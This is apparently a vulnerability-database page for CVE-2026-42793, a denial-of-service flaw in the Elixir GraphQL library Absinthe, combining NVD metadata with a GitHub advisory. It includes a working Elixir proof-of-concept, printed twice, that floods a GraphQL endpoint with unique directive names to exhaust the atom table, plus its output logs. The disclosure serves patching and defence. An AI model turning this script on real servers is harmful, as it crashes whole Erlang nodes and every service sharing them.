	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://github.com/absinthe-graphql/absinthe/commit/dd842b938e3823f345c10416914ffab5d5536838
	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-qf4g-9fqq-mmm7
	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://osv.dev/vulnerability/EEF-CVE-2026-42793

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Allocation of Resources Without Limits or Throttling vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via atom table exhaustion when parsing attacker-controlled GraphQL SDL.\n\nMultiple Blueprint.Draft.convert/2 implementations in Absinthe\u0027s SDL language modules call String.to_atom/1 on attacker-controlled names from parsed GraphQL SDL documents, including directive names, field names, type names, and argument names. Because atoms are never garbage-collected and the BEAM atom table has a fixed limit (default 1,048,576), each unique name permanently consumes one slot. An attacker can exhaust the atom table by submitting SDL documents containing enough unique names, causing the Erlang VM to abort with system_limit and taking down the entire node.\n\nAny application that passes attacker-controlled GraphQL SDL through Absinthe\u0027s parser is exposed \u2014 for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, or any developer tool that runs the parser over user-supplied documents.\n\nThis issue affects absinthe: from 1.5.0 before 1.10.2."
    }
  ],
  "id": "CVE-2026-42793",
  "lastModified": "2026-05-13T15:57:03.607",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "PRESENT",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.2,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-08T16:16:12.550",
  "references": [
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://cna.erlef.org/cves/CVE-2026-42793.html"
    },
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://github.com/absinthe-graphql/absinthe/commit/dd842b938e3823f345c10416914ffab5d5536838"
    },
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-qf4g-9fqq-mmm7"
    },
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-42793"
    }
  ],
  "sourceIdentifier": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-770"
        }
      ],
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "type": "Secondary"
    }
  ]
}

GHSA-QF4G-9FQQ-MMM7

Vulnerability from github – Published: 2026-05-14 13:08 – Updated: 2026-05-14 13:08

Summary

Absinthe: Unbounded atom creation from parsed directive name

Details

Summary

When Absinthe parses a GraphQL SDL document, every directive @<name> definition is converted into a freshly created atom without any allow-list or length cap. Because atoms are never garbage-collected and the BEAM has a hard ~1,048,576 atom-table limit, any application that feeds attacker-controlled SDL through Absinthe's parser can be crashed (whole VM termination) by submitting a document containing enough unique directive names.

Introduced in https://github.com/absinthe-graphql/absinthe/commit/d0eae7764520d4e8e5dfff619068c0de911aec33

Details

In lib/absinthe/language/directive_definition.ex:27, the Blueprint.from_ast/2 conversion does:

Macro.underscore(node.name) |> String.to_atom()

node.name is taken verbatim from the parsed GraphQL document, so the atom is created before the directive has been validated against any known schema. There is no use of String.to_existing_atom/1, no length cap, and no allow-list. Each unique directive name in the input permanently consumes one slot in the global atom table.

Any code path that runs Absinthe.Phase.Parse (or any equivalent that ultimately calls Absinthe.Blueprint.Draft.convert/2 on a parsed DirectiveDefinition node) on untrusted text is exposed — for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, an introspection-to-SDL converter, or any developer tool that runs the parser over user-supplied documents. An attacker only needs to submit one (or a handful of) SDL documents that together contain ~1M unique directive @<random> definitions to exhaust the atom table and crash the BEAM.

The same vulnerablity was found in these files as well:

lib/absinthe/language/enum_type_definition.ex:23
lib/absinthe/language/field_definition.ex:27
lib/absinthe/language/input_object_type_definition.ex:24
lib/absinthe/language/input_value_definition.ex:31
lib/absinthe/language/interface_type_definition.ex:26
lib/absinthe/language/object_type_definition.ex:27
lib/absinthe/language/scalar_type_definition.ex:23
lib/absinthe/language/union_type_definition.ex:24
maybe others too.

Please do a search&replace in the whole project.

PoC

A script that parses a generated SDL document containing many unique directive @<random> definitions through Absinthe and demonstrates unbounded atom-table growth (eventually crashing the VM) is attached at the end of this report.

Impact

This is an unauthenticated denial-of-service vulnerability (atom-table exhaustion leading to BEAM VM crash) affecting any application that passes untrusted GraphQL SDL through Absinthe's parser. The crash takes down the entire Erlang node, not just the request handler, so all unrelated workloads sharing the VM are also impacted. The only precondition is that attacker-controlled text reaches the SDL parser; no authentication, schema privileges, or query execution are required.

Scripts and Logs

# Verifies: Unbounded atom creation from parsed directive name

Mix.install([
  {:absinthe, "~> 1.7"},
  {:absinthe_plug, "~> 1.5"},
  {:bandit, "~> 1.5"},
  {:plug, "~> 1.16"},
  {:jason, "~> 1.4"},
  {:req, "~> 0.5"}
])

# Minimal Absinthe schema -- the only thing it needs to do is exist
# so that Absinthe.Plug will parse incoming GraphQL documents.
defmodule DemoSchema do
  use Absinthe.Schema

  query do
    field :hello, :string do
      resolve fn _, _, _ -> {:ok, "world"} end
    end
  end
end

# Standard absinthe_plug HTTP entry point. This is the public
# trust boundary: anyone who can reach the server can POST a
# GraphQL document, which Absinthe will parse and lower into a
# Blueprint -- the path that mints atoms from directive names.
defmodule Router do
  use Plug.Router

  plug Plug.Parsers,
    parsers: [:urlencoded, :multipart, :json, Absinthe.Plug.Parser],
    pass: ["*/*"],
    json_decoder: Jason

  plug :match
  plug :dispatch

  forward "/graphql", to: Absinthe.Plug, init_opts: [schema: DemoSchema]

  match _ do
    send_resp(conn, 404, "not found")
  end
end

port = 41_731
{:ok, server_pid} = Bandit.start_link(plug: Router, port: port, startup_log: false)

base = "http://127.0.0.1:#{port}/graphql"

# Attacker-controlled GraphQL document: a flood of unique directive
# definitions plus a trivial operation. Absinthe parses the whole
# document and converts each DirectiveDefinition AST node into a
# Blueprint, calling String.to_atom/1 on every directive name along
# the way (lib/absinthe/language/directive_definition.ex:27).
n = 5_000
random_tag = :crypto.strong_rand_bytes(4) |> Base.encode16(case: :lower)

directives =
  1..n
  |> Enum.map_join("\n", fn i ->
    "directive @atomdos_#{random_tag}_#{i} on FIELD"
  end)

document = directives <> "\nquery { hello }\n"

before_atoms = :erlang.system_info(:atom_count)

response =
  Req.post!(base,
    headers: [{"content-type", "application/graphql"}],
    body: document,
    receive_timeout: 60_000
  )

after_atoms = :erlang.system_info(:atom_count)
delta = after_atoms - before_atoms

IO.puts("HTTP status:        #{response.status}")
IO.puts("payload directives: #{n}")
IO.puts("atom_count before:  #{before_atoms}")
IO.puts("atom_count after:   #{after_atoms}")
IO.puts("delta:              #{delta}")

# Tear the listener down so the script can be re-run cleanly.
Process.exit(server_pid, :normal)

result =
  if delta >= n do
    "VERIFIED: a single HTTP POST to /graphql minted #{delta} new atoms (>= #{n} attacker-supplied directive names); BEAM atom table (~1,048,576 cap) is exhaustible by an outside attacker via Absinthe.Plug -> Absinthe.Language.DirectiveDefinition."
  else
    "NOT VERIFIED: only #{delta} new atoms were created for #{n} unique directive names sent over HTTP."
  end

IO.puts(result)

Logs

HTTP status:        200
payload directives: 5000
atom_count before:  26049
atom_count after:   32581
delta:              6532
VERIFIED: a single HTTP POST to /graphql minted 6532 new atoms (>= 5000 attacker-supplied directive names)

Severity

8.2 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "absinthe"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.5.0"
            },
            {
              "fixed": "1.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42793"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T13:08:32Z",
    "nvd_published_at": "2026-05-08T16:16:12Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nWhen Absinthe parses a GraphQL SDL document, every `directive @\u003cname\u003e` definition is converted into a freshly created atom without any allow-list or length cap. Because atoms are never garbage-collected and the BEAM has a hard ~1,048,576 atom-table limit, any application that feeds attacker-controlled SDL through Absinthe\u0027s parser can be crashed (whole VM termination) by submitting a document containing enough unique directive names.\n\nIntroduced in https://github.com/absinthe-graphql/absinthe/commit/d0eae7764520d4e8e5dfff619068c0de911aec33\n\n### Details\nIn `lib/absinthe/language/directive_definition.ex:27`, the `Blueprint.from_ast/2` conversion does:\n\n```elixir\nMacro.underscore(node.name) |\u003e String.to_atom()\n```\n\n`node.name` is taken verbatim from the parsed GraphQL document, so the atom is created before the directive has been validated against any known schema. There is no use of `String.to_existing_atom/1`, no length cap, and no allow-list. Each unique directive name in the input permanently consumes one slot in the global atom table.\n\nAny code path that runs `Absinthe.Phase.Parse` (or any equivalent that ultimately calls `Absinthe.Blueprint.Draft.convert/2` on a parsed `DirectiveDefinition` node) on untrusted text is exposed \u2014 for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, an introspection-to-SDL converter, or any developer tool that runs the parser over user-supplied documents. An attacker only needs to submit one (or a handful of) SDL documents that together contain ~1M unique `directive @\u003crandom\u003e` definitions to exhaust the atom table and crash the BEAM.\n\nThe same vulnerablity was found in these files as well:\n\n- `lib/absinthe/language/enum_type_definition.ex:23`\n- `lib/absinthe/language/field_definition.ex:27`\n- `lib/absinthe/language/input_object_type_definition.ex:24`\n- `lib/absinthe/language/input_value_definition.ex:31`\n- `lib/absinthe/language/interface_type_definition.ex:26`\n- `lib/absinthe/language/object_type_definition.ex:27`\n- `lib/absinthe/language/scalar_type_definition.ex:23`\n- `lib/absinthe/language/union_type_definition.ex:24`\n- maybe others too.\n\nPlease do a search\u0026replace in the whole project.\n\n### PoC\nA script that parses a generated SDL document containing many unique `directive @\u003crandom\u003e` definitions through Absinthe and demonstrates unbounded atom-table growth (eventually crashing the VM) is attached at the end of this report.\n\n### Impact\nThis is an unauthenticated denial-of-service vulnerability (atom-table exhaustion leading to BEAM VM crash) affecting any application that passes untrusted GraphQL SDL through Absinthe\u0027s parser. The crash takes down the entire Erlang node, not just the request handler, so all unrelated workloads sharing the VM are also impacted. The only precondition is that attacker-controlled text reaches the SDL parser; no authentication, schema privileges, or query execution are required.\n\n## Scripts and Logs\n\n```elixir\n# Verifies: Unbounded atom creation from parsed directive name\n\nMix.install([\n  {:absinthe, \"~\u003e 1.7\"},\n  {:absinthe_plug, \"~\u003e 1.5\"},\n  {:bandit, \"~\u003e 1.5\"},\n  {:plug, \"~\u003e 1.16\"},\n  {:jason, \"~\u003e 1.4\"},\n  {:req, \"~\u003e 0.5\"}\n])\n\n# Minimal Absinthe schema -- the only thing it needs to do is exist\n# so that Absinthe.Plug will parse incoming GraphQL documents.\ndefmodule DemoSchema do\n  use Absinthe.Schema\n\n  query do\n    field :hello, :string do\n      resolve fn _, _, _ -\u003e {:ok, \"world\"} end\n    end\n  end\nend\n\n# Standard absinthe_plug HTTP entry point. This is the public\n# trust boundary: anyone who can reach the server can POST a\n# GraphQL document, which Absinthe will parse and lower into a\n# Blueprint -- the path that mints atoms from directive names.\ndefmodule Router do\n  use Plug.Router\n\n  plug Plug.Parsers,\n    parsers: [:urlencoded, :multipart, :json, Absinthe.Plug.Parser],\n    pass: [\"*/*\"],\n    json_decoder: Jason\n\n  plug :match\n  plug :dispatch\n\n  forward \"/graphql\", to: Absinthe.Plug, init_opts: [schema: DemoSchema]\n\n  match _ do\n    send_resp(conn, 404, \"not found\")\n  end\nend\n\nport = 41_731\n{:ok, server_pid} = Bandit.start_link(plug: Router, port: port, startup_log: false)\n\nbase = \"http://127.0.0.1:#{port}/graphql\"\n\n# Attacker-controlled GraphQL document: a flood of unique directive\n# definitions plus a trivial operation. Absinthe parses the whole\n# document and converts each DirectiveDefinition AST node into a\n# Blueprint, calling String.to_atom/1 on every directive name along\n# the way (lib/absinthe/language/directive_definition.ex:27).\nn = 5_000\nrandom_tag = :crypto.strong_rand_bytes(4) |\u003e Base.encode16(case: :lower)\n\ndirectives =\n  1..n\n  |\u003e Enum.map_join(\"\\n\", fn i -\u003e\n    \"directive @atomdos_#{random_tag}_#{i} on FIELD\"\n  end)\n\ndocument = directives \u003c\u003e \"\\nquery { hello }\\n\"\n\nbefore_atoms = :erlang.system_info(:atom_count)\n\nresponse =\n  Req.post!(base,\n    headers: [{\"content-type\", \"application/graphql\"}],\n    body: document,\n    receive_timeout: 60_000\n  )\n\nafter_atoms = :erlang.system_info(:atom_count)\ndelta = after_atoms - before_atoms\n\nIO.puts(\"HTTP status:        #{response.status}\")\nIO.puts(\"payload directives: #{n}\")\nIO.puts(\"atom_count before:  #{before_atoms}\")\nIO.puts(\"atom_count after:   #{after_atoms}\")\nIO.puts(\"delta:              #{delta}\")\n\n# Tear the listener down so the script can be re-run cleanly.\nProcess.exit(server_pid, :normal)\n\nresult =\n  if delta \u003e= n do\n    \"VERIFIED: a single HTTP POST to /graphql minted #{delta} new atoms (\u003e= #{n} attacker-supplied directive names); BEAM atom table (~1,048,576 cap) is exhaustible by an outside attacker via Absinthe.Plug -\u003e Absinthe.Language.DirectiveDefinition.\"\n  else\n    \"NOT VERIFIED: only #{delta} new atoms were created for #{n} unique directive names sent over HTTP.\"\n  end\n\nIO.puts(result)\n```\n\n\n### Logs\n\n```logs\nHTTP status:        200\npayload directives: 5000\natom_count before:  26049\natom_count after:   32581\ndelta:              6532\nVERIFIED: a single HTTP POST to /graphql minted 6532 new atoms (\u003e= 5000 attacker-supplied directive names)\n```",
  "id": "GHSA-qf4g-9fqq-mmm7",
  "modified": "2026-05-14T13:08:32Z",
  "published": "2026-05-14T13:08:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-qf4g-9fqq-mmm7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42793"
    },
    {
      "type": "WEB",
      "url": "https://github.com/absinthe-graphql/absinthe/commit/dd842b938e3823f345c10416914ffab5d5536838"
    },
    {
      "type": "WEB",
      "url": "https://cna.erlef.org/cves/CVE-2026-42793.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/absinthe-graphql/absinthe"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-42793"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Absinthe: Unbounded atom creation from parsed directive name"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42793 (GCVE-0-2026-42793)

FKIE_CVE-2026-42793

GHSA-QF4G-9FQQ-MMM7

Summary

Details

PoC

Impact

Scripts and Logs

Logs

Tags

Sightings

Nomenclature